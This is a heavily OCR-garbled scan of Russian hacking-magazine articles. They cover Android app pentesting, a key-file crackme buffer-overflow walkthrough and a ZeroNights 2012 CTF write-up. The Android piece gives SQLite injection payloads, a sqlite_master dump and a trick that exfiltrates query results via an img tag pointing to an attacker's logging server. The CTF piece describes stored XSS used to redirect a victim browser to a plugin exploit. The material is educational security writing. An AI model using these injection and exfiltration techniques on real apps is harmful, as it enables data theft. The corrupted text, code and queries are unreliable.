ГООС 


зсісагсі г 


0 


Оиі 


19 


01:51 


бгР4УМіг.2.рагс 


йгѵхгѵхг-х 


2 


гоос 


зсісагсі г 


4096 


^ип 


18 


12:12 


АісГ.» 


-ГѴ-ГѴ-Г-- 


1 


гоог: 


зсісагсі г 


9831137 


аиі 


31 


17:03 


ВЗісІез_5АР_51арріпд . рсіі 


-гѵ-гѵ-г 


1 


гоос 


зсісагсі г 


0 


^и1 


19 


18:50 


Врз+ЬѴІІ .рагс 


-ГѴ-ГЫ-Г-- 


1 


гоос 


зс1сагс1_г 


36016 


аиі 


19 


00:30 


Сооісіез (1) .Ьіп 


ГѴ-ГѴ-Г-- 


1 


гоос 


зсісагс1_г 


86016 


оиі 


19 


00:56 


Соокіез (2) .Ьіп 


-ГѴГ-ГѴ/-Г-- 


1 


гоос 


зсісагсі г 


86016 


аиі 


20 


00:50 


СооХіез (3) .Ьіп 


гѵ-гѵ-г — 


1 


гоог. 


зс1сагс1_г 


86016 


аиі 


19 


00:29 


Соокіез.Ьіп 


ГѴ7-ГѴ-Г-- 


1 


гоог 


зс1сагс1_г 


718 


Аид 


4 


06:18 


ГіІІесІСігсІе . зѵі 


■ -гѵ-г — 


1 


гоос 


зсісагсі г 


102400 


аиі 


20 


00:58 


Нізгогу.Ьіп 


гѵ-гѵ-г 


1 


гоос 


зсісагсі г 


1533750 


аиі 


7 


20:57 


ІМАС0514. зрд 



|И>*Ь Мдс»* гтюг* » 

Соо^іе 

1 іеіл 

1 баа$Н таял ял 




(ПІ 

сэ 


ЦМЛшМівтЛпМіш 

ми 

4і>мйг»аі -гмммм 




у /исмм II им$ 1 о*!*» 




1 АгсМм» Ц 0*ММ 1 







Скачанный через !іІе файл Соокіез с правами на чтение «для всех» 



При помощи Х55 в приложении Наглядный пример Х55 
заменяем Іосаііоп на доодіе.сот в приложении 



такой файл и отправить их злоумышленнику, 
чтобы он смог авторизоваться на каком-нибудь 
веб-сервисе, используя полученные данные. 

ТИП 3. 5^^IТЕ-IN^ В ПРИЛОЖЕНИИ 

Обычно для хранения данных приложение 
использует или $ОЫіе-таблицы, или ХМІ- 
файлы. Чтобы найти файлы определенного 
приложения, нужно обратиться поадресу/сіаіа/ 
сіаІа/%арр_пате%/. 

Рассмотрим подробнее атакуна приложение 
с использованием БОЫіе іп]есІіоп. Найти уязви- 
мое приложение довольно просто, также как и с 
обычными 50Ып], только приложение при под- 
становке кавычки вуязвимое полезавершится с 
ошибкой, а в консоли можно увидеть подробный 
отчетоб 501-ошибке. Изучая исходный код при- 
ложения, не стоит забывать об опасных участках 
при работе с базой данных, например подста- 
новке переменныхнапрямую взапрос. 

Оттеории перейдем к практике. Я взял 
первое приложение, которое нашел по запросу 
Оіагу. Это приложение іІезІа.Оіаго (био5://рІаѵ. 
д э о д I с . с о гл/з ‘ с г^а р р 5/с іе{аіІ5?і(і=і1е5Іа.Ріаго1 . 

Уязвимость присутствует в запросе поиска 
заметок. Весьзапрос: 

5Е1ЕСТ сіе.*, сіс .са1:е§огу_пате, 
сіс.са^ееогу^соіог РКОМ сІіаго_еп-1:гіе5 ♦-« 
сіе ІЕРТ ^ОIN сІіаго_са-1:е§огіе5 сіс ОМ 
сІе.рагеп1=сІс._ісІ 

ИНЕКЕ (сІе.ЧехІ:’ Ііке *%55%‘ ОК - 
сІе.ЧадБ* Ііке '%55%' ОР сІе.'8р$_*-і 
Іоса-Ьіоп' Ііке ‘%5$%' 

ОР сіе. '8Р5_соогсІ' Ііке ’%55%' ОР 
сІс.са-1:е80гу_пате Ііке ’%55%') ОРОЕР Ьу ^ 
ае.сіаііе 0Е5С, ае._іа ОЕ5С 
ИМИ 0, 25 

Как это выглядит в исходном коде, можно 
увидеть на скриншоте. Легко составить ВІіпа 
50ип]есІіоп: 

ігие - %') апа 1=1-- 

■Раізе - %') апа 1=0-- 

Так как в Апагоіа-приложениях используется 
база данных $0иіе, то можно сделать запрос 
5Е1ЕСТ * ЕРОМ 5рІі1е_та5Іег— и получить всю 
структуру. 



ТИП4.5Р00РІН6 

Теперь перейдем к спуфингу контента. 

Для пентеста приложений подАпагоіа со- 
ветую использовать Апагоіа 50К и давно 
знакомый нам Вигр. Если перенаправить весь 
трафик Апагоіа-системы, запущенной под 
эмулятором, на прокси, то можно изменять 
пакеты, которые отправляются устройством 
и приходят на него: 

гооі@апагоіа-5ак/1:ооІ5 # ./етиіаіог ♦-< 
-аѵа аѵа_пате -Ь'^ір-ргоху Ы:1:р ://«-• 
127.0.0.1:8080 

Для примера можно заменить содержимое от- 
вета на запрос адреса уа.ги. 

Теперь для чего нам может это понадо- 
биться. В реальных условиях спуфинг можно 
провести с помощью специализированных 
утилит вроде Еиегсар. Предположим, что у нас 
есть приложение, которое получает данные 
с внешнего источника и записывает их в базу. 
Разработчики часто забывают об этом и могут 
допустить ошибку, составив запрос с уязвимо- 
стью. Таким образом, подменяя ответ сервера 
на нужный нам 501 іп], мы можем проводить 
различные операции на устройстве жертвы. 

Также часто хочется увидеть ответ самого 
устройства на отправленный 501-запрос. 



Интерфейс І0-6Ш для просмотра декомпилированного кода 



Для этого существует маленькая хитрость. 

Она заключается в том, что разработчики все 
чаще и чаще используют в своих приложениях 
НТМІ-коды для разметки. За их использо- 
вание отвечает класс ѴѴеЬѴіеѵ/. В Апсігоісі 
используется движок ^еЬКіІ для обработки 
НТМІ. По умолчанию Эаѵа5сгірІ в классе 
^еЬѴіеѵѵ не включен, но нам он и не по- 
надобится. Техника будет аналогична той, 
что используется в снифферах. У нас име- 
ется сервер, который записывает в лог все, 
что после ?. Таким образом, мы формируем 
запрос, чтобы он выводил в ответ «<ітд 
5гс=Нир://5егѵег/?41>»: в данном случае 
это запрос «5Е1ЕСТ Х’Зс'ІГіппд згс=1іир:// 
5егѵег/?’||Иех('А’)ЦХ’Зе';». 

ІС0ЫСЕРТ5І 

Конечно, это всего лишь малая часть того, 
как можно проводить пентест Апсігоісі- 
приложений. В завершение статьи приведу 
нереализованные концепты атак: 50Ыіе 1оас1_ 
ехІепзіопО, динамическая загрузка сторонних 
библиотек и подгрузка сторонних БД. Поста- 
раемся рассмотреть их в другой статье. Кроме 
того, в одном из следующих номеров будет 
опубликован отчет об уязвимостях, найден- 
ных в рамках конкурса «Охота за ошибками» 
от компании «Яндекс». □□ 

ГІѴІѴІ 



•иХ55и(іІе:// 

вСЬготе: 

Ьи.1у/ТР8оМ5; 

• Х55іпАп(Ігоі(1 

Арря: 

ШуШЕСШ; 

•ХЗЗіпбтаіІАрр: 

ЫУу/ЬпУиХс; 

•обзор программ 
для реверсинга 
Ап(1гоі(1- 
приложений: 
аІісІе зНа. ге/2 В2а5и; 

• пост о новой версии 
Ап(1годиаг(1 и видео 
по использованию 
ЗиЫіте-плагина: 
ЬіЫу/ѴУ5дА!9 . 
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Норсеев Сергей ІпогзееѵВдтаіІ.сот) 



ОБХОДИМ ЗАЩИТУ, 
ОСНОВАННУЮ 
НА КЕУ-ФАЙЛЕ 



Если ты увлекаешься реверсин- 
гом/крякерством, то наверняка 
заметил, что на профилирующих 
сайтах, выкладывающих специ- 
альные программки для тре- 
нировки — сгаскте, задание 
зачастую сводится к тому, что 
надо пропатчить исследуемую 
программу или восстановить 
код генерации серийного номе- 
ра. Между тем примеров защи- 
ты, основанных на использова- 
нии кеу-файлов, очень и очень 
мало. Ну что ж, сегодня мы 
восполним этот пробел и рас- 
смотрим один хороший пример. 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. 

Ни редакция, 
ни автор не несут 
ответствен- 
ности за любой 
возможный вред, 
причиненный ма- 
териалами данной 
статьи. 



СИЗ 

Сгаскте 

для тренировки ты 
найдешь на нашем 
диске. 



Честно сказать, почему на сайтах с сгаскте-задачками выкла- 
дывается так мало тестовых программок, защищенных при по- 
мощи кеу-файла, для меня остается загадкой. К одной из причин, 
наверно, можно отнести то, что большинство программ защище- 
ны серийным номером. С другой стороны, если повспоминать, 
то можно увидеть, что практически все передовые антивирусные 
продукты активируются именно при помощи специального файла: 
Антивирус Касперского, Ог.ѴѴеЬ, Аѵазі и так далее. И не только они 
одни — ѴѴіпНех, ѴѴіпРАР, Тоіаі Соттапсіег, АВВѴУ Ыпдѵо. Причем 
этот список можно продолжать еще долго. 



Іподопытн^ 

Как видишь, список программ, защищенных при помощи файла, 
тоже довольно внушительный, поэтому стоит потренироваться 
во взломе и данного типа защиты. Пришло время познакомиться 
с нашим подопытным. Чтобы к нам не пришли «добрые» дядьки 
и не отправили в Сибирь пилить елочки, тренироваться мы будем 
на специальной программке. 

Итак, знакомьтесь, сегодня у нас в гостях сгаскте, написанная 
неким ІерЬугоив. Запустим ее. При этом перед нами появится окно 
с зазывающим предложением «РІеазе СгаскМе». Нашей задачей 
будет без всякого патчинга программы сделать так, чтобы вместо 
надписи «РІеазе СгаскМе» отображалась надпись «СгаскесІ Ьу ...» 
и ник взломавшего. Ну что ж, переходим к анализу защиты. 

[АНАЛИЗИРУЕМ ЗАЩИТУ 

Загружаем «пациента» в ЮА, ОІІуОЬд или Іттипііу ОеЬиддег — 
на твой вкус. Прежде всего нам необходимо локализовать место, 
где у нас выводится строка «РІеазе СгаскМе». Найдя ее и перейдя 
к месту ее использования, видим, что она передается в качестве 
параметра в функцию ОгаѵѵТехіА, которая выводит ее на экран. 
Логично предположить, что где-то выше находится проверка, в за- 
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Взлом КеуРіІеМе 




Как сдавался КеуРіІеМе #1 под нашим напором 

висимости от которой отображается сообщение «РІеазе СгаскМе» 
или сообщение об успешном прохождении задания. 

Если пролистнуть немного вверх, на глаза попадается другая 
интересная строка — «кеу.сіаі», которая в качестве параметра 
передается функции СгеаІеРіІе. Смотрим далее по коду — если 
файл удалось успешно открыть, определяется его размер, который 
затем сохраняется по адресу 0012РВВ8И. Это приподнимает завесу 
тайны над тем, как работает защита. 

Открываем блокнот (или Нех-редактор) и создаем в нем файл 
кеу.сіаі произвольного размера и произвольного содержания, со- 
храняем этот файл в папке с программой. И перезапускаем нашу 
сгаскппе. При этом программа начинает жаловаться на кеу-файл — 
«ІпѵаІісІ КеуПІе, РІеазе СгаскМе, адаіп!». Мы на верном пути! 



Вернемся к нашему дизассемблерному листингу. Пролистнув 
его, чуть ниже находим другой фрагмент кода, непосредственно 
связанный со строкой «кеу.сіаі»: 



1:ех1::004010Е9 


ри5Ь 


о-Р-Рве! Рі1еNате ; "кеу.сіа^ 


1:ех1: 1004010 БЕ 


ри5И 


есіі ; ІПІ 


Иех1::004010ЕР 


саіі 


$иЬ_401290 


Тех1::004010Р4 


яюѵ 


еЬр, еах 


Иех-1::004010Р6 


асісі 


езр, 8 


1:ех1::004010Р9 




еЬр, еЬр 


Нехі:: 004010 Р В 


^П2 


зИогІ 1ос_401134 


Здесь строка « 


ікеу.сіаі» в качестве параметра передается 



в процедуру зиЬ_401290. После чего анализируется значение, 
возвращенное этой процедурой. Если она возвращает ненулевое 
значение (или Ігие), то происходит переход по адресу 401 134И. 

В противном случае (если эта процедура вернула нуль) отрисовы- 
вается строка «РІеазе СгаскМе». 

Ну что ж, зайдем в эту подпрограмму и посмотрим, что она де- 
лает с кеу-файлом. А делает она следующее: 

1 . Пытается открыть файл кеу.сіаі (да-да, программа дважды от- 
крывает этот несчастный файл). Если открыть его не получается, 
тогда возвращает ноль Каізе). 

2. Если файл успешно открыт, то определяет размер файла (при 
помощи функции ЗеіРіІеЗіге). Если размер файла равен нулю, 
то возвращает ноль ((аізе). 

3. Читает все содержимое файла (вот для чего сначала определял- 
ся размер) и записывает его по адресу 403080Ь. Запомни этот 
адрес, он нам дальше еще пригодится. 

4. Закрывает файл и возвращает единицу, что соответствует Ігие. 

Все, больше данная процедура не делает ничего. Если она воз- 
вращает значение, отличное от нуля (то есть с открытием и считы- 
ванием файла все прошло успешно), то осуществляется переход 
по адресу 401 134И, где происходит приблизительно следующее: 

1 . От размера файла отнимается восемь байт. 

2. Над каждым байтом «оставшегося» содержимого файла вы- 
полняется операция ісІіѵ34Ь. То есть каждый байт замещается 
на остаток отделения на число 34Ь. Обращаю твое внимание 
на то, что здесь выполняется деление со знаком. 

3. По получившемуся содержимому файла вычисляется два числа, 
которые помещаются в регистры еах и есіх (сами расчеты осу- 
ществляются в процедурах зиЬ_401410 и зиЬ_401400). 

4. Полученные значения (назовем их контрольными суммами) 
сравниваются со значениями, хранящимися по адресам 4030А8Ь 



ГДЕ НАЙТИ ВКУСНЫЕ СКАСКМЕ‘5? 




Если ты хочешь попрактиковаться в крякинге/ 
реверсинге, то рекомендую тебе взять на заметку 
несколько полезных ресурсов, на которых 
постоянно выкладывают специальные сгаскте- 
задачки. 



1. сгасктев.гіе (ѵѵѵѵѵѵ.сгаскппев.сіеі 

Отличный сайт, согромным количеством сгаскте.Всезаданияудобно 
разделены по ОС, используемомуязыкупрограммирования (на котором 
оно реализовано), а также уровню сложности (от 1 — самого простого, 
до 9 — самого сложного). Поэтому, если ты только начинаешь прошари- 
ваться в этой теме, можно будетудобно подобрать одну из простеньких 
сгаскте. Кромеэтого, для многихсгаскте выкладываются решения. 



Всегда можно посмотреть, где ступил или чемтвое решение отличается 
от предложенного. 



Еще один неплохой сайт, который, помимо непосредственно сгаскте, 
содержит еще много полезной информации, втом числе решения пред- 
ставленныхзадачек. 

СгасктевДи (сгасктев.ргѵ.рі ) 

Польский ресурс, содержащий большое количество задач по взлому 
и решений для них. Когда-то ресурс довольно активно развивался, 
нов настоящий момент, увы, необновляется. 

Ві\ѴКеѵег5Іпд ( ѵѵ\л/\л/.геѵег5Іпд.Ье 1 

В последнее время нетобновлений и на этом ресурсе. Однако база 
сгаскте и инструкций попрохождениюзаслуживаетвнимания. Реко- 
мендуютакже покопаться на форуме проекта. 
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и 4030АСЬ. Если хотя бы одно из них не совпадает 
с «образцом», выводится строка «ІпѵаІісІ Кеубіе, 
Ріеаае СгаскМе, адаіп!». 



Теперь вопрос на миллион: что именно хранится 
по адресам 4030А86 и 4030АСЬ? В начале работы 
программы там нули. В процессе ее работы их со- 
держимое также явно нигде не модифицируется. 

Выходит, ключевой файл должен быть составлен 
так, чтобы обе контрольные суммы, полученные 
на основе его содержимого, обращались в нуль? 

Вполне может быть, но, во-первых, при таком 
раскладе событий непонятно, зачем нужно было от- 
нимать восемь байт от размера этого файла. Почему 
нельзя рассчитывать контрольные суммы по всему 
содержимому этого файла? Для отвода глаз? Нет. 

Маловероятно. Что-то тут не так. 

[СЕКРЕТЕ размере! 

Давай еще раз пробежимся по тому, что мы знаем 
о защите программы: 

1 . Программа загружает все содержимое ключевого 
файла по адресу 4030806. 

2. От размера файла отнимается восемь байт. 

3. По «оставшемуся» содержимому файла вычисляются две кон- 
трольные суммы (каждая размером в четыре байта). 

4. Вычисленные контрольные суммы сравниваются с «образца- 
ми», расположенными по адресам 4030А86 и 4030АС6 (4030АС6 
> 4030А8И > 4030806 (адрес начала загруженного файла) 

и 4030АС6 - 4030А86 = 4, то есть «образцы» расположены в непо- 
средственной близости друг от друга). 

Если внимательно взглянуть на эти адреса, то можно заме- 
тить, что по 4030806 у нас загружается все содержимое файла, 
а по 4030А86 и 4030АС6 — какие-то контрольные суммы, причем 
все эти адреса расположены непосредственно друг за другом. 
Остается вспомнить, что при считывании файла в память его раз- 
мер никак не проверяется и не учитывается. Таким образом, если 
размер файла превысит 286 байт, то он перезапишет содержимое 
ячеек памяти по адресам 4030А86 и 4030АС6 своим содержимым. 
Более того, если размер файла составляет 306 байт, то его по- 
следние восемь байт (которые не участвуют в расчете контрольных 
сумм) лягут точно по адресу 4030А86. То есть они займут место 
«образцов». Классический Ьи^^ег-оѵегбоѵѵ. 

Івзлом 

Для того чтобы взломать эту программу, проделаем следующее: 

1 . Создаем файл кеу.сіаі размером 306 байт. Содержимое этого фай- 
ла, кроме последних восьми байт, может быть любым. Сохраняем 
его в каталоге с исследуемой программой. 

2. Загрузив программу в любой отладчик, ставим брейкпоинт 

по адресу 00401 1В56 (по нему происходит проверка первой кон- 
трольной суммы). Запускаем программу. 

3. Когда программа остановится на нашем брейкпоинте, записыва- 
ем содержимое регистров еах и есіх (это значения контрольных 
сумм, вычисленные по нашему файлу). 

4. Открываем ключевой файл и в предпоследние четыре байта его 
содержимого записываем (с учетом обратного порядка байт) 



значение регистра еах, а в последние четыре байта — регистра 
есіх. 

5. Сохраняем ключевой файл и запускаем программу. Все, 
она взломана. 

Имя взломавшего должно находиться в начале ключевого 
файла. Осталось только добавить свое имя в ключевой файл, чтобы 
программа его вывела. 

[МЕТОДЫ ПРОТИВОДЕЙСТВИЯ ВЗЛОМУІ 
при реализации защиты для своей программы важно всегда 
помнить: как только твоя мегапопулярная программа, защищен- 
ная серийным номером/кеу-файлом, попадает в руки к крякеру, 
считай, что она уже взломана. Ведь единственное, что необходимо 
для обхода защиты, — это сама программа, из которой крякер бы- 
стро отреверсит механизмы защиты и напишет очередной кеудеп. 
Единственное, как ты можешь защитить свою программу, — это 
сделать процесс взлома экономически нецелесообразным. То есть 
включить в программу столько защитных механизмов и установить 
такую цену, чтобы с экономической точки зрения было проще ее 
купить, чем взломать. Какие методы использовать, чтобы хоть как- 
то усилить защиту? 

Первое, что приходит на ум, — это использование нескольких 
ключевых файлов. Пусть какая-то ключевая информация хранится 
частями в разных местах. Проверка этих частей также ведется 
в разных местах программы и в разные моменты ее запуска и/ 
или работы. Тогда хакеру понадобится гораздо больше времени, 
чтобы найти все эти части и полностью восстановить алгоритм их 
проверки. 

Другой прием состоит в использовании нескольких подставных 
файлов, каждый из которых проверяется каким-нибудь долгим 
и муторным способом. Желательно, чтобы эти файлы имели «за- 
манчивые» названия, например: кеу.баі, кеубіе.сіаі, гедіпіо.баі, 
гедізігаііоп.сіаі и так далее, думаю, идея понятна. А в качестве 
ключа лучше всего использовать какой-нибудь файл с неброским 
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ЧТОБЫ БОЛЬШЕ ЗАПУТАТЬ 
ВЗЛОМЩИКА, ДЕЛАЙ ЛИШ- 
НИЕ ОБРАЩЕНИЯ К ФАЙЛАМ, 

В ТОМ ЧИСЛЕ И К КЛЮЧЕВОМУ 



названием, который легко может затеряться среди сотен других 
файлов. 

Если ключевой файл используется для контроля триального 
периода, то неплохим приемом будет использование случайной 
метки в файле. Эта метка генерируется при установке программы. 

В качестве нее может использоваться дата и время установки или, 
например, просто случайное число. Один ее экземпляр сохраняет- 
ся в этом файле, а второй — в реестре. При работе программы они 
сверяются. 

Чтобы еще больше запутать взломщика, можно дополнитель- 
но делать лишние обращения к различным файлам, в том числе 
и к ключевому. Это сильно затруднит анализ лога (ііетоп’а. Пускай 
при таких обращениях по содержимому файлов что-то вычисля- 
ется, при этом при каждом новом обращении испольэуется новый 
алгоритм. Как можно дольше храни рассчитанные таким обраэом 
значения (это всегда настораживает). Тогда хакеру придется 
потратить не одну ночь на то, чтобы раэобраться во всех этих об- 
ращениях. 

Ну и наконец, хранение имен файлов в зашифрованном виде. 
Это ослепит дизассемблеры и не даст им построить перекрестные 
ссылки на обращения к этим файлам. Но не нужно шифровать 
только имя истинного ключевого файла, так как это сразу выдаст 
защиту с головой. 

Как видишь, универсального рецепта нет. 

ІЗАКЛЮЧЕНИЁ1 

Тема защиты приложений достаточно обширна, по ней написано 
много книг и, к сожалению, ее никак не уместить в рамки не- 
большой статьи. Мы лишь рассмотрели пример базовой защиты, 
основанной на ключевом файле. Как ты убедился, это не самая 
стойкая технология, поэтому защитить с ее помощью программу 
удается далеко не всегда. И еще совет. Если тебе необходимо 
обезопасить свое приложение от взлома и заставить хакера попо- 
теть, то не используй готовых и широко распространенных техник. 
Лучше придумать что-то свое, новое. Ну или, на худой конец, вос- 
пользоваться малораспространенным. □□ 
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ОПИСАНИЕ 
ХАК-КОНКУРСА 
С КОНФЕРЕНЦИИ 
2ЕК0НІ6НТ5 2012 

В Москве 19 и 20 ноября 2012 года прошла 
международная конференция ІегоМідЫз. 

Про доклады и воркшопы можно прочитать 
в прошлом номере нашего журнала, а здесь 
я опишу один из конкурсов, который прошел 
в рамках этих двух дней, — СаІсЬ ТЬе РЬопе. 

[НАЧАЛОІ 

Для нас это был первый опыт создания подобных конкурсов, 
поэтому, может, кое-что вышло и комом — об этом лучше судить 
участникам. Хотелось создать живое и интересное состязание, 
при этом не сильно отвлекающее от треков конференции (неко- 
торые не любят СТР, потому что нельзя отвлечься ни на минуту). 
Собственно, конкурс был сделан не мной одним, а целой командой 
инженеров безопасности компании Мокіа. Очевидно, что и при- 
зы мы тоже привезли фирменные — телефоны Іитіа 920 и 820. 

Но вернемся к конкурсу. Идея была проста — линейный квест, 
из четырех флагов (заданий), где каждое следующее задание от- 
крывается только после выполнения текущего. Фактически гонка. 



Первые три задания было решено вообще не укладывать в рамки 
(Т Бесигііу, так как это банально, хотелось придумать что-нибудь 
на смекалку и логику (как выяснилось, такие задания и сложнее 
придумать, и сложнее решить — игроки не понимают, куда метил 
автор, а автор не всегда понимает, как задание поймут другие 
люди... не помешал бы бета-тест). Но обо всем по порядку. 

ІФЛАГОІ 

Фактически это точка входа в игру. Игрок должен был просто за- 
метить ОР-листовку с инфой о том, что тут начинается хак-квест. 
Разобрав этот ОР-код, он получал флаг и ссылку на страницу 
регистрации. Регистрация простая — если ввести флаг 0 и е-глаіі, 
то на указанный адрес приходит текст первого задания. 

ФЛАГ 1 1 

ТЕКСТ ПЕРВОГО ЗАДАНИЯ: 

Приветствую тебя, добрый человек. 

Меня зовут Джон Смит. Я являюсь начальником службы ИБ Ска- 
калково. И нам нужна Ваша помощь в одном деликатном деле. Мы 
уже убедились, что Вы являетесь человеком, обладающим опре- 
деленным складом ума, иначе бы Вы не получили это сообщение. 
Но ближе к сути. 

В ночь с 30 на 31 мая этого года наше подразделение 
подверглось атаке неизвестных хакеров из группы «Негатив». 

В результате они смогли закрепиться в системе. Два дня назад 
они проникли вглубь нашей СУБД и похитили важные данные, 
связанные с нанотехнологиями Скакалково и подготовкой 
нобелевских лауреатов. Мы должны вернуть эти технологии 
(злоумышленники удалили все данные из СУБД, а бэкап 
не сохранился, так как он находился в супер-облаке Зилегтел). 
Дополнительно нам стало известно, что хакеры собирались 
переслать эти данные вражеской корпорации «Кругль», которая 
пытается разработать технологию тотального контроля. 
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Флаг о, расположенный где-то в зале 



Наш агент успел переслать фотографию с места контакта. Затем 
наш агент исчез. Зная способности нашего оперативника, можно 
с уверенностью сказать, что он оставил на месте следы, коды 
или что-нибудь эдакое, хакерское. Но мы не можем определить, 
что это за место... поэтому я высылаю фотографию Вам ( Ь»р:// 
сп‘с‘і.2егопісЬ(5.огд/5ссго^Иег0_0а^Ш1а9100Г'). Вы должны 
найти это место, а также следы присутствия нашего агента. 

Приложенную фотографию ты можешь увидеть выше. Соб- 
ственно по фотографии можно сказать только одно — какие- 
то бетонные блоки с намалеванной сигной. Кое-кто использовал 
сигну как флаг или даже М05 (сигна), что логичнее, но это ошибка. 
Самыми догадливыми были те, кто внимательно прочитал текст 
задания, ведь там было четко сказано: найти место. Поэтому они 
просто просмотрели ЕХІР-информацию с фотки, нашли коорди- 
наты, которые указывали на конкретную точку рядом с местом 
проведения конференции: 

Іаіііисіе: 55.740000 

Іопдііисіе: 37.604167 

Покопавшись на месте, участники находили бетонные блоки, 
а поискав за этими блоками — и первый флаг (многие нечестные 
игроки срывали этот флаг и уничтожали, и мне приходилось пере- 
клеивать его в течение всего первого дня... позже я просто выло- 
жил его в виде подсказки). Введя этот флаг, мы получали по почте 
текст второго задания... 

ІФЛАГ2І 

НОВОЕ ПИСЬМО ГЛАСИЛО: 

Отлично. Хоть наш агент и исчез, но все же мы нашли след. 

Согласно полученным данным, хакеры из группы «Негатив» 
назначили встречу в Берлине с агентами «Кругль». К сожале- 
нию, мы не можем отправить в Берлин агента, но там у нас есть 
связной. Неожиданно он тоже пропал, но только в отпуске... Тем 
не менее незадолго до отпуска он успел сообщить об очередной 
наводке — добавочном номере телефона в колл-центре «Кругль» 
(снятый по отпечаткам пальца с Мокіа 3310) для связи с агентами 
империалистического зла. Однако сам номер он сообщил в очень 
странной форме, мы не смогли его разобрать... Этот номер невоз- 
можно перебрать методом грубой силы, поэтому нам и понадоби- 
лась Ваша помощь. Собственно, добавочный номер был нанесен 
в виде граффити напротив места тусовки всех хакеров Берлина — 
«С-ВА5Е». К сожалению, связной пропал, а ночная фотография 
(Ь!1р://са{сЬ.20гопід'і‘ -;.огд/5есгс(РсІсісг1_0?сі5о1 Осс 1 3/рІіо1о2.рпд) 
ЭТИХ граффити не помогла точно рассмотреть текст. Итак, все, 
что мы имеем, — только неудачное фото граффити с закодирован- 




Фотография из задания номер 1 

ным добавочным номером телефона и название хакерского места. 
Вы должны попытаться получить этот номер и показать нам, 
что вы его определили верно, через нашу форму приема флагов. 
Достаньте нам этот номер. 

И опять фото. На этот раз ЕХІР был пустой. Но суть задания 
точно такая же, как и в первом (для тех, кто ВНИМАТЕЛЬНО читает 
текст, так как многие пытались искать стенографические загадки, 
но нет... текст явно гласит — найти граффити на стене). Некоторые, 
тем не менее, догадались, как решить это задание — с помощью 
онлайн-карт (хотя был более простой вариант: позвонить в С-ВА5Е 
и спросить, что там у вас за граффити...). К сожалению, боодіе 
Бігееі Ѵіеѵѵ не помог тут, так как граффити над водой (это видно 
по фотографии), а Бігееі Ѵіеѵѵ доступен только с дорог. 

30-карты боодіе дают объем только зданиям, а граффити на же- 
лезнодорожном помосте, который не выполнен на картах в объеме. 
Однако есть еще 30-карты на Ьеге.пеі. которые дают объем всем 
объектам — с ними можно ознакомиться на следующей странице. 

В принципе, этого было достаточно, некоторые игроки даже 
догугливали в поиске, чтобы подтвердить, что ключевое слово 
$А20, в не 5А20. Далее осталось догадаться, как по клавиатуре 
телефонной перевести 5А20 в число (добавочный номер). После 
чего учесть тот факт, что в качестве флага мы принимаем 32 байта 
А5СІІ-НЕХ, что, скорее всего, является хешем М05. Поэтому пере- 
водим $А20 как 7296 и берем М05С7296'), это и окажется флагом. 

ІФЛАГЗ. ПОСЛЕДНИЙІ 

ПОСЛЕДНЕЕ ПОСЛАНИЕ: 

Прекрасно! Мы в шаге от победы. Последний рывок! Мы дозво- 
нились по полученному номеру и вышли на скрытую систему 
коммуникации агентов через сеть «Кругль». Получить туннелиро- 
ванный доступ к системе можно здесь: Ь! 1 р;//сіа. 2 егопідНі 5 .огд . 

Собственно, это что-то типа доски объявлений для агентов, 
только вот согласно их процедуре все агенты должны иметь спе- 
циальный плагин для работы с порталом. Мы нашли к нему путь: 
ЬИр /Ѵсіа.гегопідіг.з.огд Ьп/. Тут же можно посмотреть пример 
работы с плагином. 

Важно другое: наша цель, хакер из группы «Негатив», регу- 
лярно пользуется этим порталом как агент. При этом мы точно 
знаем, что вся информация, которую они похитили, находится 
именно на его лэптопе. Нам нужно проникнуть к нему в ноутбук 
и получить то, что нам принадлежит. Надеюсь, Вы справитесь 
с этим простым заданием. 

Ну вот и последнее задание. Добралось до него человек шесть. 
Справилисьтрое, ребята из четвертой команды были очень близки. 
Задача была простая, но комплексная. И тут все решало время. 



ХАКЕР 02/169/2013 



077 





взлом 



БЕЗОПАСНОСТЬ ЧАСТО 
СВЯЗАНА СО СЛУЧАЙНОСТЯМИ, 
И ПРАВИЛЬНЫМ МОЖЕТ 
ОКАЗАТЬСЯ ПРОСТОЕ 
РЕШЕНИЕ — ЭТО ТОЖЕ УРОК 

ІЧАСТЫ.Х55І 

Собственно, на странице сіа.гегопідЫв.огд был список сообщений 
и форма отправки, где любой желающий мог послать сообщение, 
после чего оно добавлялось в список на главной странице. Все 
игроки могли просмотреть эти сообщения. То же самое делал и наш 
«агент», виртуальная машинка под ѴігІиаІВох с ѴѴіп7/ІЕ9 на борту. 
Она регулярно просматривала все эти сообщения. Конечно, через 
тот самый браузер. И более того, с тем самым ллагином, о кото- 
ром была речь в тексте задания. Все шесть участников нашли 
зіогесі Х55 при отправке/просмотре сообщения. Но вот что делать 
дальше? Со временем все уже догадались, что надо проэксплуа- 
тировать какую-нибудь уязвимость в плагине, чтобы проникнуть 
на целевую машину (о чем в тексте задания прямым текстом и ска- 
зано). Так как другие игроки могут «подглядывать» за действиями 
и атаками других игроков, то предполагалась ситуация не просто 
тупой эксплуатации, но и сокрытия своих действий от других игро- 
ков. Многие использовали Х5$ в первый раз, чтобы определить 
ІР-адрес, версию ОС и браузер виртуальной машины-агента, и уже 
вторым сообщением вешали редирект на свою страницу с эксплой- 
том для плагина. При этом на своей странице вешали фильтр по ІР- 
адресу, тем самым не давая другим игрокам понять, где уязвимость 
и как выглядит финальный эксплойт. Впрочем, победитель не стал 
заморачиваться всеми этими ухищрениями. 



[ЧАСТЬ 2. УЯЗВИМОСТЬ В ПЛАГИНЕ] 

Некоторые ребята достали ЮА и начали реверсить плагин. Сугубо 
ресерческий подход, но умнее было запустить ОігВизІег на веб- 
сервер и найти директорию с исходниками в Ьир://сіа.2егопідЬі5. 
огд/зоигсез . Вот исходники: 

ѵоісі сіаР1и§АРІ: :Іпі1:СосІе(іп'Ь іпри-ЬСосІе) { 

ІПІ: 5І2е = 5І2ео■Р(5IСN_СО^Е_ТVРЕ); 

сосіе = (5ІСМ_С00Е_ТУРЕ * ) та11ос(зІ2е); 

мс5псру(сос1е - > _сІе5І, I "гесі", 4 * 5І2ео-Р(\л/сИаг_‘1:)); 

сосіе - > сИескБіеп = & з1а1:іс_5і§пРоіп-1:ег; 

сосіе - > соаеі = СОМ5Т.СООЕ; 

сосіе - > сосІе2 = іпри1:Сос1е; 

ге^Ьигп; 

} 

ѴОІСІ сіаР1и§АРІ: :Іпі1:Ме55а§е(соп5І: 5-^сІ: :м5‘^гіп§ & іприі) { 
мсЬаг^і * _іпри1 = (мсЬаг^І: ♦ ) іпри-С.с_5-Сг(); 
